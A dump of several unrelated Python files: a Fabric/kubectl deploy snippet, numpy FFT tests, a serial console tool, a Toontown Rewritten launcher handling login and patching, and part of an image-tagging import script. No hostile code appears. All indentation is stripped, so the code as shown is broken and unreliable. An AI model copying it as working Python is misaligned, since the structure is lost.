result = sudo('whoami')
assert result == username
with cd('montage'):
out = sudo('git checkout %s' % branch)
out = sudo('git pull origin %s' % branch)
def _webservice_shell_steps():
global _SHELL_UP
time.sleep(10)
pip_upgrade_cmd = ("kubectl exec " + SHELL_POD_NAME +
" -- www/python/venv/bin/pip install --upgrade -r montage/requirements.txt")
_SHELL_UP = True
out = sudo(pip_upgrade_cmd)
sudo('kubectl delete pod %s' % SHELL_POD_NAME)
_SHELL_UP = False
return
# needed a non-brittle* way of starting up a shell
# pod in the background. so, we background it here, and sleep to
# give time for the pod to come up and get deleted.
#
# *non-brittle = not reimplementing the internals of the
# webservice command
th = threading.Thread(target=_webservice_shell_steps)
th.start()
sudo('webservice %s shell' % TOOL_IMAGE, pty=True)
time.sleep(3)
sudo("webservice %s restart" % TOOL_IMAGE)
# $(kubectl get pods -l name=montage-dev -o jsonpath='{.items[0].metadata.name}')
|
test_pocketfft.py
|
from __future__ import division, absolute_import, print_function
import numpy as np
import pytest
from numpy.random import random
from numpy.testing import (
assert_array_almost_equal, assert_array_equal, assert_raises,
)
import threading
import sys
if sys.version_info[0] >= 3:
import queue
else:
import Queue as queue
def fft1(x):
L = len(x)
phase = -2j*np.pi*(np.arange(L)/float(L))
phase = np.arange(L).reshape(-1, 1) * phase
return np.sum(x*np.exp(phase), axis=1)
class TestFFTShift(object):
def test_fft_n(self):
assert_raises(ValueError, np.fft.fft, [1, 2, 3], 0)
class TestFFT1D(object):
def test_identity(self):
maxlen = 512
x = random(maxlen) + 1j*random(maxlen)
xr = random(maxlen)
for i in range(1,maxlen):
assert_array_almost_equal(np.fft.ifft(np.fft.fft(x[0:i])), x[0:i],
decimal=12)
assert_array_almost_equal(np.fft.irfft(np.fft.rfft(xr[0:i]),i),
xr[0:i], decimal=12)
def test_fft(self):
x = random(30) + 1j*random(30)
assert_array_almost_equal(fft1(x), np.fft.fft(x))
assert_array_almost_equal(fft1(x) / np.sqrt(30),
np.fft.fft(x, norm="ortho"))
def test_ifft(self):
x = random(30) + 1j*random(30)
assert_array_almost_equal(x, np.fft.ifft(np.fft.fft(x)))
assert_array_almost_equal(
x, np.fft.ifft(np.fft.fft(x, norm="ortho"), norm="ortho"))
def test_fft2(self):
x = random((30, 20)) + 1j*random((30, 20))
assert_array_almost_equal(np.fft.fft(np.fft.fft(x, axis=1), axis=0),
np.fft.fft2(x))
assert_array_almost_equal(np.fft.fft2(x) / np.sqrt(30 * 20),
np.fft.fft2(x, norm="ortho"))
def test_ifft2(self):
x = random((30, 20)) + 1j*random((30, 20))
assert_array_almost_equal(np.fft.ifft(np.fft.ifft(x, axis=1), axis=0),
np.fft.ifft2(x))
assert_array_almost_equal(np.fft.ifft2(x) * np.sqrt(30 * 20),
np.fft.ifft2(x, norm="ortho"))
def test_fftn(self):
x = random((30, 20, 10)) + 1j*random((30, 20, 10))
assert_array_almost_equal(
np.fft.fft(np.fft.fft(np.fft.fft(x, axis=2), axis=1), axis=0),
np.fft.fftn(x))
assert_array_almost_equal(np.fft.fftn(x) / np.sqrt(30 * 20 * 10),
np.fft.fftn(x, norm="ortho"))
def test_ifftn(self):
x = random((30, 20, 10)) + 1j*random((30, 20, 10))
assert_array_almost_equal(
np.fft.ifft(np.fft.ifft(np.fft.ifft(x, axis=2), axis=1), axis=0),
np.fft.ifftn(x))
assert_array_almost_equal(np.fft.ifftn(x) * np.sqrt(30 * 20 * 10),
np.fft.ifftn(x, norm="ortho"))
def test_rfft(self):
x = random(30)
for n in [x.size, 2*x.size]:
for norm in [None, 'ortho']:
assert_array_almost_equal(
np.fft.fft(x, n=n, norm=norm)[:(n//2 + 1)],
np.fft.rfft(x, n=n, norm=norm))
assert_array_almost_equal(np.fft.rfft(x, n=n) / np.sqrt(n),
np.fft.rfft(x, n=n, norm="ortho"))
def test_irfft(self):
x = random(30)
assert_array_almost_equal(x, np.fft.irfft(np.fft.rfft(x)))
assert_array_almost_equal(
x, np.fft.irfft(np.fft.rfft(x, norm="ortho"), norm="ortho"))
def test_rfft2(self):
x = random((30, 20))
assert_array_almost_equal(np.fft.fft2(x)[:, :11], np.fft.rfft2(x))
assert_array_almost_equal(np.fft.rfft2(x) / np.sqrt(30 * 20),
np.fft.rfft2(x, norm="ortho"))
def test_irfft2(self):
x = random((30, 20))
assert_array_almost_equal(x, np.fft.irfft2(np.fft.rfft2(x)))
assert_array_almost_equal(
x, np.fft.irfft2(np.fft.rfft2(x, norm="ortho"), norm="ortho"))
def test_rfftn(self):
x = random((30, 20, 10))
assert_array_almost_equal(np.fft.fftn(x)[:, :, :6], np.fft.rfftn(x))
assert_array_almost_equal(np.fft.rfftn(x) / np.sqrt(30 * 20 * 10),
np.fft.rfftn(x, norm="ortho"))
def test_irfftn(self):
x = random((30, 20, 10))
assert_array_almost_equal(x, np.fft.irfftn(np.fft.rfftn(x)))
assert_array_almost_equal(
x, np.fft.irfftn(np.fft.rfftn(x, norm="ortho"), norm="ortho"))
def test_hfft(self):
x = random(14) + 1j*random(14)
x_herm = np.concatenate((random(1), x, random(1)))
x = np.concatenate((x_herm, x[::-1].conj()))
assert_array_almost_equal(np.fft.fft(x), np.fft.hfft(x_herm))
assert_array_almost_equal(np.fft.hfft(x_herm) / np.sqrt(30),
np.fft.hfft(x_herm, norm="ortho"))
def test_ihttf(self):
x = random(14) + 1j*random(14)
x_herm = np.concatenate((random(1), x, random(1)))
x = np.concatenate((x_herm, x[::-1].conj()))
assert_array_almost_equal(x_herm, np.fft.ihfft(np.fft.hfft(x_herm)))
assert_array_almost_equal(
x_herm, np.fft.ihfft(np.fft.hfft(x_herm, norm="ortho"),
norm="ortho"))
@pytest.mark.parametrize("op", [np.fft.fftn, np.fft.ifftn,
np.fft.rfftn, np.fft.irfftn])
def test_axes(self, op):
x = random((30, 20, 10))
axes = [(0, 1, 2), (0, 2, 1), (1, 0, 2), (1, 2, 0), (2, 0, 1), (2, 1, 0)]
for a in axes:
op_tr = op(np.transpose(x, a))
tr_op = np.transpose(op(x, axes=a), a)
assert_array_almost_equal(op_tr, tr_op)
def test_all_1d_norm_preserving(self):
# verify that round-trip transforms are norm-preserving
x = random(30)
x_norm = np.linalg.norm(x)
n = x.size * 2
func_pairs = [(np.fft.fft, np.fft.ifft),
(np.fft.rfft, np.fft.irfft),
# hfft: order so the first function takes x.size samples
# (necessary for comparison to x_norm above)
(np.fft.ihfft, np.fft.hfft),
]
for forw, back in func_pairs:
for n in [x.size, 2*x.size]:
for norm in [None, 'ortho']:
tmp = forw(x, n=n, norm=norm)
tmp = back(tmp, n=n, norm=norm)
assert_array_almost_equal(x_norm,
np.linalg.norm(tmp))
@pytest.mark.parametrize("dtype", [np.half, np.single, np.double,
np.longdouble])
def test_dtypes(self, dtype):
# make sure that all input precisions are accepted and internally
# converted to 64bit
x = random(30).astype(dtype)
assert_array_almost_equal(np.fft.ifft(np.fft.fft(x)), x)
assert_array_almost_equal(np.fft.irfft(np.fft.rfft(x)), x)
@pytest.mark.parametrize(
"dtype",
[np.float32, np.float64, np.complex64, np.complex128])
@pytest.mark.parametrize("order", ["F", 'non-contiguous'])
@pytest.mark.parametrize(
"fft",
[np.fft.fft, np.fft.fft2, np.fft.fftn,
np.fft.ifft, np.fft.ifft2, np.fft.ifftn])
def test_fft_with_order(dtype, order, fft):
# Check that FFT/IFFT produces identical results for C, Fortran and
# non contiguous arrays
rng = np.random.RandomState(42)
X = rng.rand(8, 7, 13).astype(dtype, copy=False)
if order == 'F':
Y = np.asfortranarray(X)
else:
# Make a non contiguous array
Y = X[::-1]
X = np.ascontiguousarray(X[::-1])
if fft.__name__.endswith('fft'):
for axis in range(3):
X_res = fft(X, axis=axis)
Y_res = fft(Y, axis=axis)
assert_array_almost_equal(X_res, Y_res)
elif fft.__name__.endswith(('fft2', 'fftn')):
axes = [(0, 1), (1, 2), (0, 2)]
if fft.__name__.endswith('fftn'):
axes.extend([(0,), (1,), (2,), None])
for ax in axes:
X_res = fft(X, axes=ax)
Y_res = fft(Y, axes=ax)
assert_array_almost_equal(X_res, Y_res)
else:
raise ValueError
class TestFFTThreadSafe(object):
threads = 16
input_shape = (800, 200)
def _test_mtsame(self, func, *args):
def worker(args, q):
q.put(func(*args))
q = queue.Queue()
expected = func(*args)
# Spin off a bunch of threads to call the same function simultaneously
t = [threading.Thread(target=worker, args=(args, q))
for i in range(self.threads)]
[x.start() for x in t]
[x.join() for x in t]
# Make sure all threads returned the correct value
for i in range(self.threads):
assert_array_equal(q.get(timeout=5), expected,
'Function returned wrong value in multithreaded context')
def test_fft(self):
a = np.ones(self.input_shape) * 1+0j
self._test_mtsame(np.fft.fft, a)
def test_ifft(self):
a = np.ones(self.input_shape) * 1+0j
self._test_mtsame(np.fft.ifft, a)
def test_rfft(self):
a = np.ones(self.input_shape)
self._test_mtsame(np.fft.rfft, a)
def test_irfft(self):
a = np.ones(self.input_shape) * 1+0j
self._test_mtsame(np.fft.irfft, a)
|
console.py
|
#!/usr/bin/env python3
import os
import sys
import argparse
import serial
import threading
import time
def read_handler():
while True:
try:
b = serial_port.read()
s = b.decode('ascii')
except UnicodeDecodeError:
print(repr(b), end='')
pass
else:
print(s, end='')
sys.stdout.flush()
def write_handler():
while True:
l = sys.stdin.readline().strip()
print("*** sending '{}'".format(l))
ch = serial_port.write(l.encode('ascii'))
def main():
global serial_port
parser = argparse.ArgumentParser()
parser.add_argument("tty")
args = parser.parse_args()
try:
for _ in range(0, 5):
if not os.path.exists(args.tty):
print("console.py: {} not found. Trying after few seconds...".format(args.tty))
time.sleep(5)
except KeyboardInterrupt:
sys.exit()
print("*** opening", args.tty)
serial_port = serial.Serial(args.tty, 115200, timeout=1)
print("*** listening", args.tty)
threading.Thread(target=write_handler, daemon=True).start()
threading.Thread(target=read_handler, daemon=True).start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
serial_port.close()
sys.exit()
if __name__ == '__main__':
main()
|
launcher.py
|
"""
TODO LIST:
- Get mirai python built with _ssl and bz2
- Fix up patcher.
- Graphical User Interface (inb4 python needs m0ar)
"""
from fsm.FSM import FSM
import urllib, json, sys, os, subprocess, threading, time, stat, getpass
import settings, localizer, messagetypes
from urllib.request import urlopen
from urllib.parse import urlencode
import os
import http.client as httplib
class TTRLauncher(FSM):
"""
This is the "main" class that powers the Toontown Rewritten launcher. It manages
everything the launcher needs to do, including manage all the "sub-threads" that
carry out tasks such as patching.
As of right now, the launcher consists of 3 threads:
- "main-thread": This is the thread which holds this class, and keeps everything
running properly. This also manages state transitions as well as submitting
data to and from the web server.
- "graphical": This thread will hold the GUI side of the launcher, such as abs
wyPython interface. Usually, this is what the end user will see when running the
launcher.
- "patcher": Since the majority of the patching process is locking, it has to be
run on a separate thread to keep the main thread alive. This thread will deal with
all the files it needs to download, as well as update/patch. During the download
process, the patcher will also report back the current download percentage of the
current file it is downloading.
ERR001: This occurs when the website returns broken JSON.
ERR002: This occurs when the website returns a Non-OK response when authenticating.
ERR003: We got a response, but the data received was invalid.
ERR004: The response said our login was invalid (failed).
ERR005: User tried to submit TFA code without entering anything.
ERR006: Account server is temporarily unavailable (HTTP 503).
"""
def __init__(self, input, output):
FSM.__init__(self)
self.input = input
self.output = output
self.transitions = {'Off': [
'CheckForUpdates', 'Off', 'LaunchGame'],
'CheckForUpdates': [
'Patch', 'Off'],
'GetCredentials': [
'SubmitCredentials', 'Off'],
'SubmitCredentials': [
'LoginResponse', 'Off'],
'LoginResponse': [
'GetCredentials', 'GetTFACode', 'Delayed', 'LaunchGame', 'Off'],
'GetTFACode': [
'SubmitTFACode', 'GetCredentials', 'Off'],
'SubmitTFACode': [
'LoginResponse', 'Off'],
'Delayed': [
'CheckQueue', 'Off'],
'CheckQueue': [
'LoginResponse', 'Off'],
'Patch': [
'GetCredentials', 'Off'],
'LaunchGame': [
'GetCredentials', 'Off']}
self.version = settings.Version
self.connection = None
self.gameserver = None
self.cookie = None
self.authToken = None
self.authBanner = None
self.appToken = None
self.queueToken = None
self.patcher = None
self.interface = None
self.credentials = None
self.dontClearMessage = False
return
def sendOutput(self, data):
self.output.put(data, block=True, timeout=0.5)
def start(self):
self.sendOutput((messagetypes.LAUNCHER_STATUS, ''))
self.request('CheckForUpdates')
def enterCheckForUpdates(self):
def versionCmp(v1, v2):
v1b = v1.split('.')
v2b = v2.split('.')
if len(v1b) != len(v2b):
return None
for i in range(len(v1b)):
v1bb = int(v1b[i])
v2bb = int(v2b[i])
if v1bb == v2bb:
pass
else:
if v1bb < v2bb:
return False
if v1bb > v2bb:
return True
return False
if self.version is not None:
pass
try:
data = urlopen(settings.JSONLauncherDict.get(sys.platform, settings.DefaultJSONLauncherInfo))
except:
self.sendOutput((messagetypes.LAUNCHER_STATUS, localizer.UnableToCheckForUpdates))
self.dontClearMessage = True
self.request('Patch')
return
else:
try:
data = json.load(data.read().decode('utf-8'))
except:
self.sendOutput((messagetypes.LAUNCHER_ERROR, 'ERR001: %s' % localizer.ERR_JSONParseError))
self.request('Patch')
return
if versionCmp(data[0].get('version', '0.0.0'), self.version):
self.sendOutput((
messagetypes.LAUNCHER_VERSION_UPDATE,
data[0].get('version'),
data[0].get('rnotes'),
data[0].get('update', settings.DefaultDownloadLocation)))
self.request('Off')
self.request('Patch')
return
def enterGetCredentials(self):
if self.dontClearMessage:
self.dontClearMessage = False
else:
self.sendOutput((messagetypes.LAUNCHER_STATUS, ''))
if self.credentials is None:
username, password = self.input.get(block=True, timeout=None)
self.credentials = (username, password)
else:
username, password = self.credentials
self.request('SubmitCredentials', username, password)
return
def enterSubmitCredentials(self, username, password):
self.sendOutput((messagetypes.LAUNCHER_STATUS, localizer.GUI_Authing))
self.connection = httplib.HTTPSConnection(*settings.SSLConnection)
headers = {'Content-type': 'application/x-www-form-urlencoded'}
params = urlencode({'username': username.encode('utf8'),
'password': password.encode('utf8')})
self.connection.request('POST', settings.LoginPostLocation, params, headers)
self.request('LoginResponse')
def enterLoginResponse(self):
try:
response = self.connection.getresponse()
except httplib.BadStatusLine:
self.sendOutput((messagetypes.LAUNCHER_ERROR, 'ERR006: %s' % localizer.ERR_AccServerDown))
self.credentials = None
self.request('GetCredentials')
else:
if response.status == httplib.SERVICE_UNAVAILABLE:
self.sendOutput((messagetypes.LAUNCHER_ERROR, 'ERR006: %s' % localizer.ERR_AccServerDown))
self.credentials = None
self.request('GetCredentials')
if response.status != httplib.OK:
self.sendOutput((messagetypes.LAUNCHER_ERROR, 'ERR002: %s' % localizer.ERR_Non200Resp % {'response': str(response.status)}))
self.credentials = None
self.request('GetCredentials')
try:
data = json.loads(response.read().decode('utf-8'))
except:
self.sendOutput((messagetypes.LAUNCHER_ERROR, 'ERR001: %s' % localizer.ERR_JSONParseError))
print("json parse error in area 1")
self.request('Off')
success = data.get('success', 'false')
self.connection.close()
self.connection = None
if success == 'true':
self.cookie = data.get('cookie', 'NoCookieGiven')
self.gameserver = data.get('gameserver', 'NoServerGiven')
self.request('LaunchGame')
else:
if success == 'false':
self.sendOutput((messagetypes.LAUNCHER_ERROR, data.get('banner', localizer.ERR_InvalidLogin)))
self.credentials = None
self.request('GetCredentials')
self.sendOutput(messagetypes.LAUNCHER_CLEAR_PASSWORD)
else:
if success == 'partial':
self.authToken = data.get('responseToken', None)
self.authBanner = data.get('banner', '')
self.request('GetTFACode')
else:
if success == 'delayed':
eta = int(data.get('eta', 5))
self.sendOutput((messagetypes.LAUNCHER_STATUS, localizer.GUI_Queue % eta))
self.queueToken = data.get('queueToken', None)
self.request('Delayed', eta)
return
def enterGetTFACode(self):
if self.authToken is None:
self.sendOutput((messagetypes.LAUNCHER_ERROR, 'ERR005: %s' % localizer.ERR_TFAWithoutToken))
self.request('Off')
self.sendOutput((messagetypes.LAUNCHER_STATUS, ''))
self.sendOutput((messagetypes.LAUNCHER_REQUEST_TFA, self.authBanner))
self.appToken = self.input.get(block=True, timeout=None)
if self.appToken is None:
self.credentials = None
self.request('GetCredentials')
self.request('SubmitTFACode')
return
def enterSubmitTFACode(self):
self.sendOutput((messagetypes.LAUNCHER_STATUS, localizer.GUI_Authing))
self.connection = httplib.HTTPSConnection(*settings.SSLConnection)
headers = {'Content-type': 'application/x-www-form-urlencoded'}
params = urlencode({'appToken': self.appToken,
'authToken': self.authToken})
self.connection.request('POST', settings.LoginPostLocation, params, headers)
self.request('LoginResponse')
def enterDelayed(self, timeDelay):
if self.queueToken is None:
self.sendOutput((messagetypes.LAUNCHER_ERROR, 'ERR007: %s' % localizer.ERR_DelayWithoutToken))
self.request('Off')
time.sleep(max(timeDelay, 1))
self.request('CheckQueue')
return
def enterCheckQueue(self):
self.connection = httplib.HTTPSConnection(*settings.SSLConnection)
headers = {'Content-type': 'application/x-www-form-urlencoded'}
params = urlencode({'queueToken': self.queueToken})
self.connection.request('POST', settings.LoginPostLocation, params, headers)
self.request('LoginResponse')
def enterPatch(self):
from patcher import Patcher
self.patcher = threading.Thread(target=Patcher.Patch, name='Patcher-Thread', args=(self.__updateProgress, self.__updateFile))
self.patcher.daemon = True
self.patcher.start()
while self.patcher.isAlive():
time.sleep(0.2)
self.request('GetCredentials')
def __updateProgress(self, percentage):
if self.output.empty():
self.sendOutput((messagetypes.LAUNCHER_PROGRESS, percentage))
def __updateFile(self, fileCount):
#if self.output.empty():
self.sendOutput((messagetypes.LAUNCHER_STATUS, fileCount))
def exitPatch(self):
self.sendOutput((messagetypes.LAUNCHER_PROGRESS, -1))
def enterLaunchGame(self):
os.environ['TTR_PLAYCOOKIE'] = self.cookie
os.environ['TTR_GAMESERVER'] = self.gameserver
if sys.platform == 'win32':
game = subprocess.Popen('TTREngine', creationflags=134217728)
else:
modes = os.stat('TTREngine').st_mode
if not modes & stat.S_IXUSR:
os.chmod('TTREngine', modes | stat.S_IXUSR)
game = subprocess.Popen('./TTREngine')
self.sendOutput((messagetypes.LAUNCHER_STATUS, localizer.GUI_PlayGameFarewell))
time.sleep(1)
self.sendOutput(messagetypes.LAUNCHER_HIDE)
while game.poll() is None:
time.sleep(1.5)
os.system("/app/bin/wmclass") #Sets the WM_CLASS of Toontown Rewritten so that DE can show icon
if game.returncode == 0:
self.sendOutput(messagetypes.LAUNCHER_CLEAR_PASSWORD)
self.sendOutput(messagetypes.LAUNCHER_SHOW)
self.sendOutput(messagetypes.LAUNCHER_ENABLE_CONTROLS)
self.credentials = None
self.dontClearMessage = True
self.sendOutput((messagetypes.LAUNCHER_STATUS, localizer.GUI_PlayAgain))
time.sleep(1.5)
self.request('GetCredentials')
return
self.sendOutput(messagetypes.LAUNCHER_SHOW)
self.sendOutput(messagetypes.LAUNCHER_PLAY_RETRY)
if self.input.get(block=True, timeout=None):
self.request('GetCredentials')
else:
self.request('Off')
return
def enterOff(self):
if self.connection is not None:
self.connection.close()
self.sendOutput(messagetypes.LAUNCHER_EXIT)
return
|
add.py
|
from __future__ import print_function
from __future__ import unicode_literals
from hashlib import md5
from PIL import Image
from io import BytesIO
from os.path import basename, dirname, realpath, exists, lexists, join, sep
from os import readlink, symlink, unlink, stat
from wellpapp import Client, VTstring, make_pdirs, RawWrapper, identify_raw, ExifWrapper, raw_exts, VTgps
from struct import unpack
from multiprocessing import Lock, cpu_count, Queue, Process, Manager
from traceback import print_exc
from sys import version_info, exit
from argparse import ArgumentParser
if version_info[0] == 2:
from Queue import Empty
from io import open
else:
from queue import Empty
def determine_filetype(data):
data2 = data[:2]
data3 = data[:3]
data4 = data[:4]
data6 = data[:6]
data8 = data[:8]
data16 = data[:16]
data48 = data[4:8]
if data3 == b"\xff\xd8\xff":
# probably jpeg, but I like to be careful.
if data[-2:] == b"\xff\xd9":
# this is how a jpeg should end
return "jpeg"
if data[-4:] == b"SEFT" and b"SEFH" in data[-100:] and b"\xff\xd9\x00\x00" in data[-256:]:
# samsung phones like to add this crap after the jpeg.
# no idea why it's not in a makernote, but here we are.
return "jpeg"
if data6 in (b"GIF87a", b"GIF89a") and data[-1:] == b";":
return "gif"
if data8 == b"\x89PNG\r\n\x1a\n" and data[12:16] == b"IHDR":
return "png"
if data2 == b"BM" and ord(data[5:6]) < 4 and data[13:14] == b"\x00":
return "bmp"
if data4 in (b"MM\x00*", b"II*\x00", b"IIRO", b"IIU\x00", b"FOVb", b"FUJI",):
return identify_raw(BytesIO(data))
flen = unpack("<I", data48)[0]
dlen = len(data)
if data3 == b"FWS" and flen == dlen:
return "swf"
if data3 == b"CWS" and dlen < flen < dlen * 10:
return "swf"
if data4 == b"RIFF" and data[8:12] == b"AVI " and flen < dlen < flen * 1.4 + 10240:
return "avi"
if data3 == b"\x00\x00\x01":
return "mpeg"
if data4 == b"\x1a\x45\xdf\xa3" and b"matroska" in data[:64]:
return "mkv"
if data4 == b"\x1a\x45\xdf\xa3" and b"webm" in data[:64]:
return "webm"
if data4 == b"OggS" and data[28:35] in (b"\x01video\x00", b"\x80theora"):
return "ogm"
if data16 == b"\x30\x26\xb2\x75\x8e\x66\xcf\x11\xa6\xd9\x00\xaa\x00\x62\xce\x6c":
return "wmv"
if data48 in (b"ftyp", b"mdat"):
blen = unpack(">I", data4)[0]
if data[blen + 4:blen + 8] == b"moov":
if data48 == b"mdat" or data[8:10] == b"qt":
return "mov"
else:
return "mp4"
if blen < 100 and (data[8:10] == b"qt" or data[8:12] in (b"3gp4", b"\0\0\0\0")):
return "mov"
if data[0:1] == b"\x00" and data[8:12] in (b"mp41", b"mp42", b"isom"):
return "mp4"
if data48 == b"moov" and data[12:16] in (b"mvhd", b"cmov"):
if b"\x00" in (data[0:1], data[8:9], data[16:17]):
return "mov"
if data4 == b"FLV\x01" and data[5:9] == b"\x00\x00\x00\x09" and ord(data[13:14]) in (8, 9, 18):
return "flv"
if data.startswith(b"%PDF-"):
return "pdf"
def _gpspos(pos, ref):
pos = pos[0] + pos[1] / 60 + pos[2] / 3600
if ref and ref[0] in "SWsw":
pos = -pos
return "%.7f" % (pos,)
def fmt_tagvalue(v):
if not v: return ""
if isinstance(v, VTstring):
return "=" + repr(v.str)
else:
return "=" + v.str
def flash_dimensions(data):
sig = data[:3]
assert sig in (b"FWS", b"CWS")
data = data[8:]
if sig == b"CWS":
from zlib import decompress
data = decompress(data)
pos = [0] # No "nonlocal" in python2
def get_bits(n, signed=True):
val = 0
for i in range(n):
sh = 7 - (pos[0] % 8)
bit = (ord(data[pos[0] // 8]) & (1 << sh)) >> sh
if i == 0 and signed and bit:
val = -1
val = (val << 1) | bit
pos[0] += 1
return val
bpv = get_bits(5, False)
xmin = get_bits(bpv)
xmax = get_bits(bpv)
ymin = get_bits(bpv)
ymax = get_bits(bpv)
return [int(round(v / 20.0)) for v in (xmax - xmin, ymax - ymin)]
def mplayer_dimensions(fn):
from subprocess import Popen, PIPE, STDOUT
p = Popen(["mediainfo", "--Inform=Video;%Width% %Height%", fn],
stdout=PIPE, stderr=STDOUT, close_fds=True)
data = p.communicate()[0].split()
return tuple(map(int, data))
movie_ft = set("swf avi mpeg mkv ogm mp4 wmv flv mov webm".split())
def pdf_image(fn):
from subprocess import check_output
cmd = ["gs",
"-q",
"-sDEVICE=pngalpha",
"-sOutputFile=-",
"-dFirstPage=1",
"-dLastPage=1",
"-dBATCH",
"-dNOPAUSE",
"-dSAFER",
"-r100",
fn,
]
return check_output(cmd, close_fds=True)
def main(arg0, argv):
def needs_thumbs(m, ft):
if args.regenerate_thumbnail: return True
jpeg_fns, png_fns = client.thumb_fns(m, ft)
for fn, z in jpeg_fns + png_fns:
if not exists(fn): return True
def exif2tags(exif, tags):
cfg = client.cfg
if "lenstags" in cfg:
lenstags = cfg.lenstags.split()
for lt in lenstags:
if lt in exif:
v = exif[lt]
if isinstance(v, tuple) or hasattr(v, "pop"):
v = " ".join([str(e) for e in v])
lt = "lens:" + lt + ":" + v
if lt in cfg:
tags.add_spec(cfg[lt])
try:
make = exif["Exif.Image.Make"].strip()
model = exif["Exif.Image.Model"].strip()
cam = "camera:" + make + ":" + model
if cam in cfg:
tags.add_spec(cfg[cam])
except Exception:
pass
if "set_tags" in cfg:
for st in cfg.set_tags.split():
tn, et = st.split("=", 1)
if et in exif:
v = exif[et]
if ("FocalLength" in et or "FNumber" in et) and not v:
continue
tags.add_spec(tn + "=" + str(exif[et]))
if "Exif.GPSInfo.GPSLatitude" in exif:
lat = _gpspos(exif["Exif.GPSInfo.GPSLatitude"], exif["Exif.GPSInfo.GPSLatitudeRef"])
lon = _gpspos(exif["Exif.GPSInfo.GPSLongitude"], exif["Exif.GPSInfo.GPSLongitudeRef"])
if "Exif.GPSInfo.GPSAltitude" in exif:
from fractions import Fraction
alt = Fraction(exif["Exif.GPSInfo.GPSAltitude"])
if "Exif.GPSInfo.GPSAltitudeRef" in exif and float(exif["Exif.GPSInfo.GPSAltitudeRef"]):
alt = -alt
gps = VTgps("%s,%s,%.1f" % (lat, lon, alt))
else:
gps = VTgps("%s,%s" % (lat, lon))
tags.add(("aaaaaa-aaaadt-faketg-gpspos", gps))
if args.override_tags:
tags.add(("aaaaaa-aaaac8-faketg-bddate", exif.date(args.timezone)))
class tagset(set):
def add(self, t):
guid, val = t
prefix = ""
if guid[0] in "~-":
prefix = guid[0]
guid = guid[1:]
chk = (guid, "~" + guid)
rem = None
for v in self:
if v[0] in chk: rem = v
if rem: self.remove(rem)
if prefix != "-": set.add(self, (prefix + guid, val))
def difference(self, other):
other = {(guid, None if val is None else val.format()) for guid, val in other}
for guid, val in self:
if (guid, None if val is None else val.format()) not in other:
yield guid, val
def add_spec(self, s):
try:
with lock:
t = client.parse_tag(s)
except Exception:
print("Failed to parse: " + s)
return
if t:
self.add(t)
else:
print("Unknown tag " + s)
def update(self, l):
[self.add_spec(s) for s in l]
def update_tags(self, l):
[self.add((t.pguid, t.value)) for t in l]
def find_tags(fn):
path = "/"
tags = tagset()
if client.cfg.tags_filename:
for dir in dirname(fn).split(sep):
path = join(path, dir)
TAGS = join(path, client.cfg.tags_filename)
if exists(TAGS):
tags.update(open(TAGS, "r", encoding="utf-8").readline().split())
if args.tags_from_fn:
tags.update(basename(fn).split()[:-1])
return tags
def record_filename(m, fn):
dn = client.image_dir(m)
rec_fn = join(dn, "FILENAMES")
known = {}
if exists(rec_fn):
for line in open(rec_fn, "r", encoding="utf-8", errors="backslashreplace"):
r_m, r_fn = line[:-1].split(" ", 1)
known.setdefault(r_m, []).append(r_fn)
if m not in known or fn not in known[m]:
with lock:
with open(rec_fn, "a", encoding="utf-8", errors="backslashreplace") as fh:
fh.write(m + " " + fn + "\n")
def generate_cache(m, fn, jz):
cache_fn = client.cfg.image_base + "/cache"
if exists(cache_fn):
s = stat(fn)
z = s.st_size
mt = int(s.st_mtime)
if jz:
l = "1 %s %d %d %d %s\n" % (m, z, mt, jz, fn)
else:
l = "0 %s %d %d %s\n" % (m, z, mt, fn)
with lock:
with open(cache_fn, "a", encoding="utf-8") as fh:
fh.write(l)
def add_image(fn, m, data, warn_q):
fn = realpath(fn)
with lock:
post = client.get_post(m, True)
if post:
ft = post.ext
else:
ft = args.type or determine_filetype(data)
assert ft
p = client.image_path(m)
if lexists(p):
ld = readlink(p)
is_wpfs = False
try:
dot = fn.rindex(".")
if "/" not in fn[dot:]:
bare_fn = fn[:fn.rindex(".")]
if m == bare_fn[-32:] and readlink(bare_fn)[-32:] == m:
is_wpfs = True # probably
except (OSError, ValueError):
pass
if is_wpfs:
if not args.quiet:
print("Not updating", fn, "because this looks like a wellpappfs")
elif exists(p):
if fn != ld:
if not args.dummy: record_filename(m, fn)
if not args.quiet:
print("Not updating", m, fn)
else:
if args.dummy:
if not args.quiet: print("Would have updated", m, fn)
else:
record_filename(m, ld)
if not args.quiet: print("Updating", m, fn)
unlink(p)
do_cache = False
if not lexists(p) and not args.dummy:
make_pdirs(p)
symlink(fn, p)
do_cache = True
if not post or needs_thumbs(m, ft):
do_cache = True
if ft in movie_ft:
if not args.thumb_src:
print("Can't generate " + ft + " thumbnails")
exit(1)
if not post:
if ft == "swf":
w, h = flash_dimensions(data)
else:
w, h = mplayer_dimensions(fn)
else:
if ft == "pdf":
data = pdf_image(fn)
datafh = RawWrapper(BytesIO(data))
try:
img = Image.open(datafh)
except IOError:
if args.thumb_src:
img = Image.open(RawWrapper(open(args.thumb_src, "rb")))
print("Warning: taking dimensions from thumb source")
else:
raise
w, h = img.size
if do_cache and not args.dummy:
if ft in raw_exts:
jfh = RawWrapper(BytesIO(data), True)
jfh.seek(0, 2)
jz = jfh.tell()
jfh.close()
else:
jz = None
generate_cache(m, fn, jz)
exif = ExifWrapper(fn)
if not post:
rot = exif.rotation()
if rot in (90, 270): w, h = h, w
kw = {"md5": m, "width": w, "height": h, "ext": ft}
if rot >= 0: kw["rotate"] = rot
date = exif.date(args.timezone)
if date:
kw["imgdate"] = date
if args.dummy:
print("Would have created post " + m)
else:
with lock:
client.add_post(**kw)
if needs_thumbs(m, ft):
if args.dummy:
print("Would have generated thumbs for " + m)
else:
rot = exif.rotation()
if args.thumb_src:
img = Image.open(RawWrapper(open(args.thumb_src, "rb")))
client.save_thumbs(m, img, ft, rot, args.regenerate_thumbnail)
full = tagset()
weak = tagset()
with lock:
post = client.get_post(m, True)
posttags = tagset()
if post:
posttags.update_tags(post.tags)
filetags = find_tags(fn)
try:
exif2tags(exif, filetags)
except Exception:
print_exc()
warn_q.put(fn + ": failed to set tags from exif")
for guid, val in filetags.difference(posttags):
if guid in post.tags and not args.override_tags:
print("Not overriding value on", post.tags[guid].pname)
elif guid[0] == "~":
weak.add((guid[1:], val))
else:
full.add((guid, val))
if full or weak:
with lock:
if args.no_tagging or args.dummy:
full = [client.get_tag(g).name + fmt_tagvalue(v) for g, v in full]
weak = ["~" + client.get_tag(g).name + fmt_tagvalue(v) for g, v in weak]
print("Would have tagged " + m + " " + " ".join(full + weak))
